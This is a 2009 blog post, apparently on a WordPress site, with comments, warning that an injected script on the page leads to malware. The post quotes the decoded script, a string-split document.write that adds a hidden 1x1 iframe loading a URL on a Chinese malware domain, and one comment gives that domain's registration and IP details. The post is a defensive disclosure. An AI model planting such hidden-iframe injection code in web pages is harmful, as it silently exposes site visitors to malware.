Please, contact wordpress, demand that they clean up the template and secure the site, I am using their platform. Here’s what I got:
Posted on | August 24, 2009 | 3 Comments
I decrypted what that new script they put at the end of the page. It is another link to malware. Looking at the code I saw they were using standard escape codes. So by , “unescaping” it, the text becomes clear.
This is what it translates to : ( I left out the script language= Javacript so that it doesn’t execute in your email:
document.wr’+’it’+’e(<iframe wid’+’th=1 height=1’+’ border=0 fr’+’ameb’+’order=’+’0 src=’https://spywa‘+’re-security.cn/cyber/in.cgi?4‘></
As you can see, it sends the person to the site spyware-security.cn.. This is the site that is flagged as spreading malware. I think the script was just changed because the scanners had caught on to the signature of the last one.
So either someone has access to your blog and is able to change the coding ( a regular user setting up the blog cannot do that since they use templates provided by WorldPress ), or WorldPress has been hacked and it is on their template ( which means that it is not just your site that has this ). Normally I would suggest you cjhange templates, but you said because of the Berg suit nothing could be changed.
I suggest you contact Worldpress about it.
Comments
3 Responses to “Please, contact wordpress, demand that they clean up the template and secure the site, I am using their platform. Here’s what I got:”












29839 Sta Margarita Pkwy, 
Videography by Barbara Rosenfeld 

August 24th, 2009 @ 3:28 pm
The word id wordpress, not worldpress.
August 25th, 2009 @ 8:40 pm
At iptools.com the domain name security-spyware.cn is registered in the name of McDougall Heather. The IP addresses 91.212.198.52 and 69.56.222.10 that are related to this domain name establish that the server is in Guatemala. The owner of the IP addresses appears to be in Russia and is Nevedomsky AA